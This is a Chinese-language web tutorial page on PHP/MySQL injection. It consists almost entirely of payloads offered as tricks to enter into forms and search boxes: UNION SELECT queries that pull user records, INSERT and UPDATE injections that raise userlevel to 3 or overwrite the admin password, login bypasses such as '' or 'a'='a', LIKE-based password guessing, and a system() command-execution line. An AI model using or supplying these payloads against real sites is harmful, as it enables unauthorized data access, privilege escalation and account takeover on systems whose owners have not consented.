PHP注入技术

特殊技巧：在表单，搜索引擎等地方写：

"___"

".__ "

"%

%' orDER BY articleid/*

%' orDER BY articleid#

__' orDER BY articleid/*

__' orDER BY articleid#

$command = "dir c:\";system($command);

select * FROM article where articleid='$id'

select * FROM article where articleid=$id

1' and 1=2 union select * from user where userid=1/* 句中变为

(select * FROM article where articleid='1' and 1=2 union select * from user where userid=1/*')

1 and 1=2 union select * from user where userid=1

语句形式：建立一个库，插入：

create DATABASE `injection`

create TABLE `user` (

`userid` int(11) NOT NULL auto_increment,

`username` varchar(20) NOT NULL default '',

`password` varchar(20) NOT NULL default '',

PRIMARY KEY (`userid`)

) ;

insert INTO `user` VALUES (1, 'swap', 'mypass');

插如一个注册用户：

insert INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');

"insert INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')";

insert INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1')

"insert INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'";

insert INTO membres SET login='',password='',nom='',userlevel='3',email=''

"insert INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')";

update user SET password='$password', homepage='$homepage' where id='$id'

update user SET password='MD5(mypass)' where username='admin'#)', homepage='$homepage' where id='$id'

"update membres SET password='$pass',nom='$nom',email='$email' where id='$id'";

update membres SET password='[PASS]',nom='',userlevel='3',email=' ' where id='[ID]'

"update news SET Votes=Votes+1, score=score+$note where idnews='$id'";

长用函数：

DATABASE()

USER()

SYSTEM_USER()

SESSION_USER()

CURRENT_USER()

比如：

update article SET title=$title where articleid=1 对应函数

update article SET title=DATABASE() where id=1

#把当前数据库名更新到title字段

update article SET title=USER() where id=1

#把当前 MySQL 用户名更新到title字段

update article SET title=SYSTEM_USER() where id=1

#把当前 MySQL 用户名更新到title字段

update article SET title=SESSION_USER() where id=1

#把当前 MySQL 用户名更新到title字段

update article SET title=CURRENT_USER() where id=1

#把当前会话被验证匹配的用户名更新到title字段

：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：：
$req = "select * FROM membres where name like '%$search%' orDER BY name";

select * FROM membres where name like '%%' orDER BY uid#%' orDER BY name

select * FROM membres where name like '%%' orDER BY uid#%' orDER BY name

select uid FROM admins where login='' or 'a'='a' AND password='' or 'a'='a' （经典）

select uid FROM admins where login='' or admin_level=1#' AND password=''

select * FROM table where msg like '%hop'

select uid FROM membres where login='Bob' AND password like 'a%'#' AND password=''

select * FROM membres where name like '%%' orDER BY uid#%' orDER BY name

上一页  [1] [2]